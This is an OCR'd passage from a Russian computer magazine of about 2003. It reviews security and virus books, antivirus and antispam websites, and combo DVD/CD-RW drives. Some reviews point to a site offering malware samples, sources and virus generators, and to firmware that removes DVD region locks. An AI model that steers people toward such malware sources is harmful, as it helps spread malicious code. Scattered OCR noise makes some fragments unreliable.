сообщениями о том, что один из 
продуктов компании Microsoft 
подвержен тому или иному багу. В 


результате чего большинство 
аналитиков считают 
нецелесообразным устанавливать 
на платформу Win любой сервис 
(например, веб-сервер), тесно 
связанный с сетью интернет. Но 
есть люди, которые придерживаются 
совсем иного мнения. Они 
утверждают, что главная беда 
состоит не в том, что продукты 
компании Microsoft лишены 
определенного уровня 
безопасности. Дело в том, что 
многие админы просто не ставят 
вовремя заплатки, в результате чего 
толпы юных хакеров берут штурмом 
их сервера. И они отчасти правы. 
При должной настройке, в чем и 
поможет эта книга, системы на ядре 
WinNT (а я имею в виду Win2k и 
WinXP) представляют крепкий 
орешек для взломщика. Ладно, 
хватит теории, давай ближе к телу. В 
начале книги тебя познакомят с 
общим устройством данной OS, 
затем посвятят в тайны проведения 
анализа и сбора информации при 
помощи NetBIOS, подробно 
расскажут о методах взлома 
SMB/CIFS. Также в книге имеется 
полный мануал по защите веб- 
сервера IIS, базы данных SQL. Если 
ты админишь тачку под 
управлением OS Windows, эта книга 
должна на время стать твоей 
библией. 


ЭНЦИКЛОПЕДИЯ 
КОМПЬЮТЕРНЫХ ВИРУСОВ 


Автор: 
Козлов Д.А., Парандовский А.А., 
Парандовский А.К. 


Издательство: 
СОЛОН-Р 

Год издания: 
2001 


Название этого талмуда не 
отражает его полного 
содержания. Я бы, скорее, назвал 
его "Как написать вирус", так как 
бОльшая часть - именно об этом. 


pager Е 
Вал 
д a ates 


Книга состоит из двух частей: 
теория и практика. Теоретическая 
часть начинается с истории вирусов: 
когда было зарегистрировано их 
появление, как вирусы оказались в 
России, и где произошла первая 
дикая "эпидемия". Есть интересная 
глава про суть вирусов: их методы и 
принципы действия, в каких формах 
и типах они существуют. А еще в 
этой главе авторы пытаются донести 
go читателя оценку их реальной 
опасности. Прежде чем приступить к 
обзору практической части, 
напомню, что весь код - на 
ассемблере. Ты научишься 
создавать огромное количество 
различных вирусов: и резидентные, 
и нерезидентные, и Com, и exe, а 
также загрузочные и макро-вирусы. 
К сожалению, намного меньше 
внимания уделено методам защиты. 
Но несмотря на этот недочет, в книге 
толково расписано, как определить, 
заражен ли твой компьютер, что 
делать, если найден загрузочный 
вирус, как можно восстановить 
файлы после буйства "заразы", а 
также как распознать 
полиморфного зверя. Если ты 
хочешь узнать побольше о вирях - 
эта книга для тебя. 


АССЕМБЛЕР В ЗАДАЧАХ 
ЗАЩИТЫ ИНФОРМАЦИИ 


Автор: 
Бурдаев O., Иванов M., Тетерин И. 


Издательство: 
Кудиц-Образ 
Год издания: 
2002 


Как говорил один мой 

знакомый, без криптографии 
сейчас никуда. Полностью 
поддерживая его мнение, я обратил 
внимание на книгу, в которой 
подробно рассмотрен язык 
программирования Ассемблер для 
семейства процессоров Intel 80x86 


и способы его применения для 
защиты информации. Каждый 
правильный хакер должен быть 
компетентен в вопросах 
криптографии и защиты 
информации, так что обрати 
внимание на этот толковый талмуд. 
Теперь немного о самой книге. 
Первая глава (а всего их три) 
рассчитана на начинающего 
программиста. Она описывает 
архитектуру компьютера IBM РС, 
систему команд, способы адресации 
данных, системные функции, 
некоторые приемы 
программирования. Вторая глава 
рассказывает о криптографических 
методах и возможных способах 
решения задач контроля 


целостности и обеспечения 
секретности информации. Третья 
глава посвящена специфическим 
применениям Ассемблера, таким как 
защита программ от статического и 
динамического исследования, 
борьба с вирусами, `изошренное` 
программирование. Для нас эта 
глава представляет наибольший 
интерес, а если ты не силен в асме, 
то тебе поможет следующая книга... 


АССЕМБЛЕР. УЧЕБНЫЙ КУРС 
(2-Е ИЗДАНИЕ) 


Автор: 
Пирогов В. 


Издательство: 
BHV 

Год издания: 
2003 


В этой книге рассматриваются 

вопросы, связанные с 
программированием на ассемблере 
для операционных систем MS-DOS и 
Windows. Приведены примеры 
программирования периферийных 
устройств на уровне регистров 
ввода/вывода. Программирование с 
использованием АР! изложено 
применительно к функциям 
операционных систем MS-DOS, 


Windows и сетевой операционной 
системы Novell Netware. Наряду с 
такими сложными темами, как 
работа в защищенном режиме, 
организация защиты информации 


на диске и программирование 
контроллера прерываний, 
приводится материал и для 
начинающих, в частности, описана 
структура программ и их трансляция, 
работа с файлами и использование 
ассемблера с языками высокого 
уровня. В книгу включены около 150 
примеров работающих программ с 
подробным разъяснением их 
устройства. Если ты хочешь 
научиться виртуозно 
программировать на ассемблере, эта 
книга должна у тебя быть. 


УКРОЩЕНИЕ ИНТЕРНЕТА 


Автор: 

Крис Касперски 
Издательство: 
СОЛОН-Р 

Год издания: 
2002 


Крис Касперски не сидит без дела, 
выпуская шедевр за шедевром. 
Книга "Укрощение Интернета" стала 
четвертой в популярной серии 


» 
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9 | "Кодокопатель", и я 
рекомендую ее каждому, кто 
считает себя хакером. Книга 
написана в форме вопрос - ответ. 
Ежедневно отвечая на множество 
вопросов, приходящих на е-тай, 
Крис решил объединить их в одной 
книге. Сказано - сделано. Книга 
разбита на главы, каждая из 
которых вносит ясность в 
определенную тему. Первая глава 
посвящена проблемам удаленного 
доступа. В ней автор подробно 
рассказывает, как можно настроить 
модемное соединение на 
максимальную производительность, 
приводит полное описание утилиты 
MTUSpeed, а также раскрывает 
тайну назначения полей DUN- 
файла. Вторая глава - это общие 
вопросы по Сети. Что такое DNS, 
порты, протоколы. Ты также 
узнаешь все секреты почты и 
получения файлов, прочтешь о том, 
как можно заработать деньги в 
интернете и о многом другом. Для 
нас наибольший интерес 
представляет глава о безопасности 
в Сети, так как там есть 
информация по защите от злобных 
вирусов. Как защититься от 
вирусов, какой антивирус лучше и 
почему, каковы цели 
вирусописателей. Ты знаешь? Если 
нет, то читай! 


КОМПЬЮТЕРНЫЕ ВИРУСЫ: 
ЧТО ЭТО ТАКОЕ И КАК C НИМИ 
БОРОТЬСЯ 


Автор: 
Касперский Е. 


Издательство: 
СК-ПРЕСС 

Год издания: 
1998 


Касперский, гроза всех 

вирусописателей. Кто, как не 
он, знает все о вирусах и 
антивирусах? Своими знаниями он 
готов поделиться с тобой. Как и 
следовало ожидать, книга 
начинается с теоретической части, 
где гуру пытается дать точное 
определение вируса, затем следует 
плавный переход к истории 
появления вирусов, где и когда они 
впервые дали о себе знать, как 
появились первые антивирусы и, 
наконец, предсказание того, что нас 
ждет в далеком и счастливом 
будущем. Следующая часть книги 
посвящена глубокому анализу всех 
существующих на данный момент 
вирусов: загрузочных, файловых, 
резидентных, а также некоторых 
других. Мануал по обнаружению 
вредоносных программ прилагается. 
Если хочешь быть в курсе того, что 
происходит в мире вирусов и 
антивирусов (ты ведь этого 
хочешь?), книга настоятельно 
рекомендуется для прочтения, как, 
собственно, и все книги в обзоре. 


ЗАЩИТА ОТ КОМПЬЮТЕРНОГО 
ТЕРРОРИЗМА: СПРАВОЧНОЕ 
ПОСОБИЕ 


Автор: 
Соколов A.B., Степанюк O. 


Издательство: 
ВН\-Санкт-Петербург 
Год издания: 

2002 


Эта книга принадлежит перу 
создателя одного из самых 
популярных антивирусов в мире 
под скромным названием Kaspersky 
Anti-Virus. Да, это Евгений 
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ХАКЕРСПЕЦ 


Здесь собраны материалы по 

защите информации. 
Описываются методы контроля и 
защиты информации при помощи 
технических средств. Можно узнать 
о методах защиты компьютерных 
сетей и персональных компьютеров. 
Есть полезное описание некоторых 
программ и систем. Особое 
внимание уделено способам 
криптографической защиты. Книга 


предназначена для широкого круга 
читателей - пользователей 
персональных компьютеров, 
специалистов, занимающихся 
вопросами обеспечения 
информационной безопасности, 
желающих ближе познакомиться с 
этой тематикой, ну и, естественно, 
для тебя :). 


МОНИТОРИНГ И АНАЛИЗ 
СЕТЕЙ. МЕТОДЫ ВЫЯВЛЕНИЯ 
НЕИСПРАВНОСТЕЙ 


Автор: 
Э.Уилсон 


Издательство: 
NOPU 

Год издания: 
2002 


Ты когда-нибудь задумывался 

над тем, что происходит 
внутри сети? Почему 
многоуровневые приложения 
внезапно начинают работать 
медленно, отказывают задания 
печати, исчезают сетевые 
элементы? Все это можно найти в 
книге "Мониторинг и анализ сетей. 
Методы выявления 
неисправностей". Книга является 
полным практическим руководством 
по мониторингу и анализу сетей на 
основе Windows МТ, которое 
существенно пополнит твои знания 
об эффективной работе 
компьютерных сетей. Описаны 
основные протоколы для анализа и 
мониторинга сетей (TCP/IP, IPX/SPX, 
Ethernet и Samba). Книга 
"Мониторинг и анализ сетей" 
поможет добиться максимальной 
производительности и надежности 
системы. Если у тебя есть локальная 
сеть, или ты просто подключен к 
интернету, то книгу обязательно 
стоит прочитать - так ты сможешь 
избежать многих неприятностей, 
поджидающих тебя в паутине. So 


у По вашим многочисленным 
HOBbIL просьбам издательство 
(дате)! STEVE) Ил 


ЖУРНАЛ ее 
= ежемесячное издание 
nPoxox НИИ «Путеводитель: Страна Игр», 
полностью посвященное 

~ прохождениям и кодам 


р КО OB! | к самым популярным 
® компьютерным играм 


:: 112 страниц исчерпывающей 
информации о лучшин 
компьютерных проекта! 


:: Самые детальные 
руководства и тактические 
советы, впечатляющие 
подборки нинтов и кодов, 
описание скрытых 
возможностей и приемов по 
взлому, рекомендации от 
мастеров киберспорта и 
многое другое! 


ее 


4 


:: СО-приложение, под завязку 
HaBHTOe неоБноДимыми 
трейнерами, сейвами, модами, 
патчами и прочими полезными 
Бонусами! 


:: Двунсторонний постер 
формата AZ, который поможет 
вам в пронождении игр и 
нанождении секретов. 


самый верный компас 


на просторан виртуальных миров! 


ЧТОБЫ ВРЕМЯ НЕ ТЕРЯТЬ |) 


Скрыпников Сергей aka Slam (sergey@soobcha.org) 


ЧТОБЫ ВРЕМЯ 
НЕ ТЕРЯТЬ 


ОБЗОР СЕТИ НА НАЛИЧИЕ ВКУСНЫХ САЙТОВ 


... а прис- 
ланную 
"Вкус- 
ной_Кис- 
кой" фотог- 
рафию уж 
очень хо- 
чется сох- 
ранить на 
дискету. 
Что же де- 
лать? 


Знаю, что бывают 
такие случаи, когда 
ты сидишь в компьютерном клубе, и 
под рукой нет антивируса, а 
присланную "Вкусной_Киской" 
фотографию уж очень хочется 
сохранить на дискету. Что же 
делать? Тут на помощь приходят 
онлайн-сервисы по проверке 
файлов на наличие вирусов. Ты 
заходишь на определенную 
страничку, указываешь файл на 
своем винчестере и смотришь 
результат проверки. Приступим?! 


WWW.DIALS.RU/WWW_AV 


Проверяем в режиме реального времени 


Проверка идет с помощью 
всенародно признанного 
антивируса Dr.Web. Страничка очень 

быстро грузится (проверялось на 
стандартном dial-up'e), с навигацией 
проблем возникнуть не должно. 
После проверки выдается 
стандартный краткий отчет о 
проверке. Сразу скажу, что у всех 
онлайн-сервисов по проверке 
файлов на вирусы есть два 
недостатка (по крайней мере, самых 
существенных) - ты не сможешь 
проверить системную область 
винчестера, для этого нужно будет 
устанавливать антивирус 
непосредственно на свой 
компьютер, что не всегда удобно, 
как уже говорилось выше; и ты не 
сможешь проверить больше одного 
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Если нужно быстро проверить небольшой 
файл на вирусы, то тебе сюда. 


Навигация: 


Скорость проверки на вирусы: 
5 


файла за раз (если ты нашел 
способ, как это можно сделать, жду 
тебя в мыло). 


WWW.KASPERSKY.RU 


2 & 


Самый ярый соперник Dr.Web'a... Или 
наоборот :) 


Еще один онлайн-сервис для 

твоих нужд. Принцип работы 
тот же самый, т.е. ты заходишь на 
страничку, выбираешь сфайл и 
ждешь, когда система рухнет :). Вот 
что написано на самой страничке: 
"Однако следует помнить, что 
стопроцентной гарантией может 
быть только регулярное 
использование антивируса с 
регулярно обновляемыми базами 
данных", т.е. проверять файлы на 


Выглядит уже не по-детски, подходит для 
тех, кто любит исчерпывающую информа- 
цию, иногда даже ненужную. 


Навигация: 


Скорость проверки на вирусы: 


вирусы в интернете - это, как 
говорится, "на всякий пожарный". 
Страничка грузится немного 
медленнее, чем у предыдущего 
конкурента, но что очень 
порадовало, так это обширный отчет 
о результатах проверки файла, да к 
тому же в базе Касперского почти 
на 30 тысяч больше известных 
вирусов, чем в базе Данилова. 


WWW.ANTIVIRUSPRO.RU/ON- 
LINE3.HTM 


На всякий случай :) 


Здесь тебе предложат 

провериться (вернее не тебе, а 
твоему компу) с помощью Panda 
АсНуебсап. В общем-то, ничего 
примечательно в этом антивирусе я 
не заметил, да и онлайн-проверка 
проходит в стандартном режиме. 
Можно отметить, что база на август 
2003 года составляла около 66000 
известных вирусов, что больше, чем 
у Данилова, но меньше, чем у 
Касперского. Так сказать, золотая 
середина. 


Ничего особенного. 


И еще, думаю, тебе будет интересно 
почитать вот это (взято с 
www.drweb.ru/faq.shtml#1): 


Разница не в количестве вирусов, а 
в технологии подсчета этого 
количества разными антивирусами. 
В программе Doctor Web одной 
записью в базе может определяться 
gO нескольких сотен вирусов. 
Авторы других антивирусов 
предпочитают несколько 
разновидностей одного и того же 
вируса, иногда отличающихся друг 
от друга всего лишь парой байт, 
подсчитывать отдельно. Кроме того, 
в базах некоторых антивирусов 
содержится большое число записей, 
предназначенных для 
детектирования так называемых 
"ключеделалок" (генераторов 
лицензионных ключей), "кряков" 
(утилит для снятия защит от 
копирования) и массы других 
программ, к вирусам никакого 
отношения не имеющих. Однако они 


Не могу не отметить большую 
вирусную энциклопедию, собственно 
благодаря ей этот сайт и попал в 
наш обзор. В ней ты прочитаешь о 
самых известных вирусах, обо всех 
типах известных вирусов, о том, как 
надо защищаться. 


= Е ак _ 5 
a- ye 123 вы ee 


Читаем о WinNuke 


ее. сара фам Se ры 
Неплохо, да?! 


Итог: 


Хороший сайт, посвященный антивирусам, 
стоит посетить для общего развития. Ну a 
если ты представитель фирмы, то просто 
обязан зайти, почитать, посмотреть на це- 
ны и решить для себя: оно тебе надо? :) 


4 
и Хороший сайт, если тебе нужно описание 
включаются в число ‘определяемых 5 
ИВИС аННО ЗА ВЫШОТ группы каких-то вирусов, или ты просто ин- 
ру i у ii тересуешься всем, что с ними связано. 
показатели качества. Сайт обновляется часто, так что ты будешь жу, что у 
в курсе всех последних событий. всех он- 
Навигация: VIRUSLAB.RU лайн-серви- 
з сов по про- 
5 = верке фай- 
ЗНАКОМИМСЯ C ВИРЯМИ ТЕ лов на ви" 
5 русы есть 
по крайней 
WWW.VIRUSLIST.COM мере два 
недостатка. 


= 7 
= | = = 
т 


Cie ee ee ee 
Bonbwaa вирусная энциклопедия 


Очень большой ресурс, 
[>> посвященный исключительно 


проблеме вирусов. Здесь ты 
найдешь и результаты тестирования 
самых известных антивирусов, и 
новейшие технологии, которые 
внедряют в свои продукты 
разработчики ПО и железа, и 
двадцатку самых популярных 
вирусов за неделю. Список можно 
продолжать очень долго, но думаю, 
тебе будет интереснее, если ты 
увидишь все сам. Еще хочу 
отметить, что на этом сайте ты 
можешь заработать, если 
подойдешь под системные 
требования: 
1) Быть в теме компьютерной 
безопасности (вирусы, спам, взломы 
и хакеры, бреши, ошибки в ПО, 
связанные с этим судебные 
разбирательства и законодательные 
инициативы). 
2) Уметь правильно расставить 
рядом слова, буквы и цифры. 
И если тебя оценят, ты будешь 
получать гонорар за каждый 
написанный тобой килобайт 
полезного текста. 


WWW.ANTIVIRUSPRO.RU 


Антивирусный центр 


Сайт, прежде всего, должен 

заинтересовать тех людей, 
которые работают в фирмах, где 
сохранность информации стоит на 
первом месте (хотя в ХХ! веке я вижу 
только три проблемы: защита 
информации, ядерная война и 
глобальное потепление, так что будем 
считать, что сайт решает глобальные 
проблемы человечества :)). Именно 
здесь можно заказать антивирусный 
пакет, который подходит для твоего 
бизнеса. Но сайт интересен не только 
ЭТИМ. 
www.antiviruspro.ru/faq/fag.htm - тут 
можно почитать и о фирме, и об 
антивирусах, кстати, есть и полезные 
вещи. 
www.antiviruspro.ru/surprise/parodies.ht 
т - можно скачать прикольные 
программки-пародии на известные в 
свое время антивирусы (это то же 
самое, что заново сесть за игру в 
арканоид, поверь мне). 
www.antiviruspro.ru/antivirus.htm - 
почитать о всех известных антивирусах. 


Сайт Панды в России 


Что сразу не понравилось, так 
yy | это немыслимое время 
загрузки на диалапе и множество 
всякой рекламы (очень мешает, 

когда все флешки начинают 
крутиться и мигать). 

Теперь непосредственно об 
информационной начинке сайта: 

есть и вирусная энциклопедия, 
правда на английском (http://serv- 
ice.pandasoftware.es/enciclopedia2/E 
ntradaEnciclopedia.html?idioma=2), 

и технические характеристики 
антивирусов панда, плюс 

руководства пользователя в 
электронном виде 
(www.viruslab.ru/docs_new.html). 

О том, что Ha сайте есть все для тех, 

у кого стоит антивирус Панда, я 
говорить не буду, т.к. таких людей на» 


Список 


можно про- 
должать 
очень дол- 
го, но gy- 
маю, тебе 
будет инте- 
реснее, если 
ты увидишь 
все сам. 


В разделе 
"юмор" 
можно про- 
вести нес- 
колько при- 
ятных ми- 
нут. 


ЧТОБЫ ВРЕМЯ НЕ ТЕРЯТЬ | 


Pee rT 


H 
: 
В 


Много о Панде в одном месте 


порядок меньше, чем тех, кто 
пользуется другими антивирусами, 
они и сами смогут все без проблем 
найти. 


Если у тебя Panda, то это твое. 


5 
р 


Viruses don't Вам 


ignorance do! 


Этот сайт в полном объеме 

посвящен вирусам, также тут 
предоставляется место тем, кто пишет 
вирусы, вирус-группам и каждому, кто 
видит для себя что-то интересное в 
компьютерных вирусах. 
Тут ты можешь скачать сами вирусы 
(они запакованы в архивы, в 
коллекции больше 10000 
экземпляров, 
http://vx.netlux.org/src.shtml), 
исходники, журналы, полиморфик 
движки, генераторы вирусов 
(http://vx.netlux.org/vx.php?id=tidx), 
вирусы для "экзотичных" платформ, 
симуляторы вирусов. Все на 
английском, но думаю, школьных 
знаний будет достаточно. Есть очень 
полезный раздел "Ссылки", тут все 
ссылки тематически разделены, 
можно сортировать по имени, 


Е ИТ 
* $ = = 


Рай для даунлодеров 
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времени или количеству хитов, к 
тому же все линки (по крайней мере 
те, которые я тыкал) были рабочими! 
http://vx.org.ua/lib_ru.shtml - хорошая 
подборка материалов на русском 


языке о вирусах, законе, сцене. 
О том, что есть форум и колонка 
новостей, говорить не буду :). 


Однозначно стоит взглянуть на это чудо! 


Навигация: 


5 

5 

WWW.MCAFEE.RU 

А be hnae @ Е: 


Красив 


Если у тебя продукты от 

McAfee, то ты и сам знаешь 
этот адрес. Все до боли знакомо, 
служба техподдержки, обновления, 
онлайн-покупка и т.п. В общем, этот 
сайт не вошел бы в обзор, если бы 
не одно НО: есть на нем такая фича, 
как проверка твоего компа в режиме 
реального времени на вирусы. 
Ты качаешь AKTUBX компонент, 
который весит 1,6 метра, 
разрешаешь ему установиться на 
комп и ждешь :). Все совершенно 
бесплатно и никогда не повредит. 


oe ПИ ee | 
умаю, стоит взглянуть 


Если есть нормальный антивирус, то можно 
было не читать. 


Навигация: 


Как видно из названия, сайт, 
прежде всего, для 


Посмотрим? 


пользователей продуктов от 
Данилова. Посмотрим, что же тут 
есть для всех остальных. 
http://drweb.ru/misc/ - здесь можно 
посмотреть описание некоторых 
вирусов, на мой взгляд, самых 
распространенных, можно 
подписаться\отписаться от 
рассылки и почитать некоторые 
статьи, непосредственно связанные 
с антивирусом Dr.Web. 
www.drweb.ru/fag.shtml - часто 
задаваемые вопросы по 
одноименным продуктам. 


Даже не могу подвести итог, т.к. сайт 
в принципе предназначен только 


для тех, кто юзает Dr.Web, если ты 
не в их числе, то ищем дальше :). 


НАДОЕЛ СПАМ? 
WWW.NOSPAM.NM.RU 


Проект NoSpam 


Неплохой сайт no проблеме 

спама. Кстати, как ты уже, 
наверное, заметил, в настоящее 
время спам приобретает все более 
глобальные масштабы, у меня, 
например, около 70% 
корреспонденции - это спам, а 
тратить деньги на перекачку всего 
этого ненужного хлама ой как не 
хочется! Создатели условно делят 
рекламу на две ветки: спам и 
баннеры, по каждой ветке конкретно 
написана идеология и средства 
борьбы с этим. В разделе "ссылки" 
неплохой подбор сайтов для борьбы 
со злобными спамерами, вот только 
некоторые из них: 
www.ezhe.ru/ses/ 
http://antispam.home.nov.ru/ 
http://ordb.org/ - OpenRelay 
DataBase, почти все SMTP сервисы, 


которые предоставляют открытый 
доступ, ими и пользуются спамеры 
http://spam.abuse.net/ 


Подойдет для начального ознакомления со 
спамом и средствами борьбы с ним. 
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Все, что нужно для борьбы со спамом 


Бросается в глаза почти 

полное отсутствие дизайна, 
упор сделан на информативное 
наполнение сайта, что очень радует. 
Тут материал для себя могут найти и 
профессионалы, и обычные 
пользователи. Есть очень полезная 
информация, например о том, как 
вычислить отправителя спама и 
отправить жалобу 
(www.antispam.ru/4user/examples_he 
ader.shtml), или о том, как спрятать 
свой адрес 
(www.antispam.ru/sh?act=msg&id=101 
6725252). На сайте постоянно 
упоминается документ - 
www.stopspam.org/email/headers/he 
aders.html, в котором очень 
подробно и грамотно 
рассказывается о том, как читать 
заголовки почтовых сообщений с 
целью определения адресов, по 
которым нужно посылать жалобы на 
полученный тобой спам. 


Более глубокое изучение проблемы спама 


Навигация: 
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ANTISPAM.RIN.RU 


Kak пишут разработчики: 

"Посетив наш проект, Вы 
узнаете: что такое спам и с чем его 
"едят"; его виды и как бороться со 
спамом; последние новости и многое 
другое. Здесь Вы сможете скачать 
антиспамерские программы и 
ознакомиться с наиболее полным 
списком спамеров и антиспамеров. 
Кроме этого предлагаем Вам услуги 


Еще один ресурс 


whois-cepBuca для определения ис- 
точников спама". 

В принципе, добавить нечего, просто 
скажу, что ресурс действительно сто- 
ящий, информации очень много, в 
разделе "юмор" можно провести нес- 
колько приятных минут, а в форуме 
выяснить наболевшие вопросы. Есть 
"Откровения бывшего спамера" 
(http://antispam.rin.ru/mytest10.htm), 
где подробно рассказывается, как 
нужно рассылать рекламные письма! 


Итог: 


Однозначно стоит посмотреть, почитать и 
сломать СПАМ! 


Навигация: 


WWW.SECURITYLAB.RU 


Много вкусного о компьютерной 
безопасности 


Интересный сайт про компьютер- 

ную безопасность, тут и множе- 
ство статей по теме, и эксплоиты, ро- 
рум, отдых, полезный сосрт, уязвимос- 
ти (хотя для этого лучше www.void.ru 
или www.bugtraq.ru/) и много чего еще. 
Что приятно - сайт постоянно обновля- 
ется, и на нем выкладываются статьи 
ведущих специалистов в теме компью- 
терной безопасности. 


Думаю, теперь ты сможешь без 
проблем найти в Сети именно то, что 
тебя интересует. Мой мыл открыт, 
есть вопросы - пиши! i 


(5) Harp 


test_lab (test_lab@gameland.ru) 


КОМБАЙНЫ HA РЫНКЕ! | 


КОМБАЙНЫ 
НА РЫНКЕ: 


ТЕСТИРОВАНИЕ КОМБИНИРОВАННЫХ 
О\0/СО-Р/В\-ПРИВОДОВ 
S 
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р) 


нтересная ситуация 


сложилась в настоящее 


время на рынке опти- 


ческих носителей. Но- 
вые технологии и стан- 
дарты плодятся, как кролики, а старые и 
не думают отмирать. И что же делать 
прикажешь? Запихивать в кузов кучу 
приводов так, чтобы слота живого не бы- 
ло? Но и кузов - не резиновый, и деньги 
- ресурс редкий, поэтому приходится де- 
лать выбор между "зарезать болвань" и 
"насладиться качеством DVD". 

Больше не приходится! Производители 
решили эту проблему, выпустив на ры- 
нок комбо-приводы, то есть драйвы, 
способные как записывать CD-R/RW, 
так и читать Э\/О-диски разных форма- 
тов, причем между известными бренда- 
ми уже существует нехилая конкурен- 
ция, а цены на девайсы вполне демок- 
ратичны (порядка 50 условных egu- 
ниц). Таким образом, сегодня в нашем 
тестировании приняли участие комби- 
нированные DVD/CD-R/RW-npuBogb! в 
ценовой категории go 60 долларов. 


СПИСОК УСТРОЙСТВ 


GIGABYTE 
GO-W0404A 


GCC-4480B 


SAMSUNG 
SM-352B 


SONY Combo 
CRX300E 


TOSHIBA 
SD-RI1312 
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ВНЕШНИЕ ДАННЫЕ 

Все участники сегодняшнего тести- 
рования рассчитаны под пятидюймо- 
вый слот, однако по длине несколько 
отличаются. Самые компактные - SONY 
и ТЕАС, они примерно одного размера. 
Самый большой и разлапистый привод 
- TOSHIBA. По весу все девайсы при- 
мерно одинаковые: от 0,9 go 1,1 кг, за 
исключением SAMSUNG, вес которого 
по специофикации - 0,77 кг. 
По дизайну передней панели SAM- 
SUNG - вне конкуренции: скругленные 
углы у лотка и удобная круглая кно- 
почка, подсвечиваемая диодом (очень 
удобно находить ее в темноте), остав- 
ляют самые приятные впечатления. 
Также очень понравилась кнопка у 
привода LG, сделанная этаким бугор- 
ком - легко нащупывается и нажимает- 
ся. Легко найти кнопку и у драйва 
GIGABYTE. У SONY, TOSHIBA и TEAC 
кнопочка стандартная, маленькая, 
длинная и узкая, плохо нащупывается 
и нажимается, а у SONY еще и сраба- 
тывает не с первого нажатия. 
Задняя панель у всех приводов станда- 
ртна: все гнезда объединены в один 
блок, что очень правильно, так как 
меньше шансов расшатать их, вставляя 
и вынимая шлейфы и питание. Устрой- 
ство TOSHIBA удивило отсутствием по- 
ясняющей схемы для разъемов на зад- 
ней части - у всех остальных приводов 
она была, причем иногда в двойном эк- 
земпляре (сверху и сзади). 


ШУМ, ГАМ И ТЕМПЕРАТУРА 
Шум, издаваемый выезжающим 
лотком, очень важный параметр, если 
ты решил втайне от родных посмот- 
реть видеодиск с "клубничкой". При- 
Bog от TOSHIBA здесь тебя, несомнен- 
но, подведет, так как его лоток выезжа- 
ет и убирается с громким жужжанием, 
похожим на звук неисправного кибор- 
га из голливудских фильмов. Лоток 
драйва SONY тоже довольно громкий. У 
GIGABYTE и SAMSUNG лоток двигается 
очень тихо, но в начале и в конце дви- 
жения негромко щелкает. Самые тихие 
лотки у ЕС и TEAC. 
При работе с диском у всех приводов 
прослеживается прямая зависимость 


шума и вибрации от скорости чтения/за- 
писи. Все девайсы заметно шумят при 
чтении дисков с данными и тихо читают 
DVD с фильмом. Самые тихие приводы в 
обзоре - SAMSUNG и GIGABITE, которые 
гудели тише всех и не издавали посто- 
ронних звуков. SONY и TEAC шумят не 
очень сильно, однако часто пугают от- 
четливым странным скрипом при пози- 
ционировании и распознавании диска. 
TOSHIBA и LG шумят громко, однако не 
издают посторонних звуков, как SONY и 
ТЕАС. 

В ходе напряженных тестов все приво- 
ды заметно нагревались. В специфика- 
ции привода TOSHIBA прямо указано, 
что устройство может нагреваться gO 
50 градусов, остальные производите- 
ли о температуре умолчали. По резуль- 
татам тестов, меньше всех греется де- 
вайс GIGABITE, больше всех - TEAC. 


РАЗНООБРАЗИЕ ФОРМАТОВ 

Как тебе, должно быть, известно, с 
момента появления стандартна CD-DA 
(аудиодиск) для него была разработа- 
на куча дополнений и расширений, 
связанных с более рациональным ис- 
пользованием дискового пространства 
- CD-ROM model и mode2 (диски на 63 и 
74 минуты), с продвинутой коррекцией 
ошибок - CD-ROM ХА, с хранением раз- 
личных типов данных (VideoCD, CD- 
Xtra, Photo-CD, Mixed CD ит.д.). Предс- 
тавленных комбо-драйвы поддержива- 
ют практически все указанные дформа- 
ты, за исключением такой экзотики, как 
CD-G/M (аудиодиск со слоем статичных 
картинок, текста и MIDI, используется 
для караоке) - его не поддерживают 
GIGABITE и LG. 
CD-R/RW поддерживается всеми при- 
водами в полном объеме. Доступны: 
многосессионная запись (Multi- 
Session), пакетная запись (Packet 
Writing), диск на лету (Disc at Once), cec- 
сия на лету (Session at Once), трек Ha 
лету (Track at Once) ит.д. 
Что касается DVD, то производители 
так и не смогли прийти к единому cpop- 
мату. В настоящее время существует 6 
срорматов записи DVD (DVD-ROM, DVD- 
R for General, DVD-R for Authoring, DVD- 
RAM, DVD-RW, DVD+R, DVD+RW). Сов- 


ременный комбайн должен читать все 
эти форматы, чтобы юзер не задумы- 
вался, с каким именно диском он имеет 
дело, за исключением, быть может, 
DVD-RAM, который не очень распрост- 
ранен. Участники тестирования, по дан- 
ным Nero Infotool, совместимы со всеми 
срорматами DVD, за исключением DVD- 
RAM. DVD-RAM type 2 (без картриджа) 
поддерживают только TOSHIBA (входит 
в соответствующий консорциум) и 
SAMSUNG. 


ТЕХНОЛОГИИ 

Для СО-В\/-привода очень важно 
наличие защиты от опустошения бу- 
qepa (Buffer Underrun Protection), так 
как в случае опустошения буфера 
произойдет ошибка, и информация 
станет нечитаемой. Такой защитой об- 
ладают все устройства из обзора. 
Современные приводы также должны 
поддерживать технологию Mount 
Rainier, которая позволяет срормати- 
ровать CD-R/RW-guck на лету и рабо- 
тать с ним в Windows XP, как с обыч- 
ной дискетой. Эту технологию, по дан- 
ным Nero Infotool, не поддерживают 
только приводы GIGABYTE и TOSHIBA. 


ИНТЕРФЕЙС 

Приводы, представленные в обзо- 
ре, имеют IDE(ATAPI) интерфейс. Пи- 
ковая скорость передачи данных че- 
рез интерфейс (Burst Rate) на сорока- 
жильном шлейсре, согласно специсори- 
кациям, у всех устройств составляет 
16,6 Мб/с, на восьмидесятижильном - 
33,3 Мб/с. 


ПРОШИВКИ 

Также очень большой проблемой 
для нашей страны является ограниче- 
ние количества смены зон DVD. Дело в 
том, что при просмотре DVD с фильмом 
в девайс автоматически прописывается 
соответствующая зона, и счетчик 
уменьшается на единицу. Сменить зону 
можно 5 раз. Таким образом, нельзя 
долго смотреть диски, предназначенные 
для разных регионов. Однако существу- 
ют пропатченные прошивки, позволяю- 
щие снять ограничение: для SAMSUNG - 
Х802, для TOSHIBA - ХО12, XH13 и ХАОб. 
А также утилиты: для SONY - LtnFlash, 


GIGABITE LG SAMSUNG SONY TEAC TOSHIBA 
Скорость пе едачи 
Средняя 4.85 Х 6.27 Х 6.55 Х 6.16 X 6.15 X 6.35 X 
Стартовая 2.65 Х 3.41 X 3.58 X 2.41 X 2.41X 3.45 X 
Конечная 3.36 Х 4.34 X 4.54 Х 4.27 X 4.24 Х 4.40 Х 
Метод САУ CAV CAV CAV CAV CAV 


Время поиска 


Случайного 11 1$ 102 ms 95 ms 102 ms 103 ms N/A 
1/3 126 ms 105 ms 108 ms 120 ms 120 ms М/А 
Полного 168 ms 156 ms 176 ms 197 ms 213 ms М/А 


Использование ЦП 


1X 1% 1% 1% 1% 1% 1% 
Максимальная скорость 2% 2% 1% 1% 2% 3% 
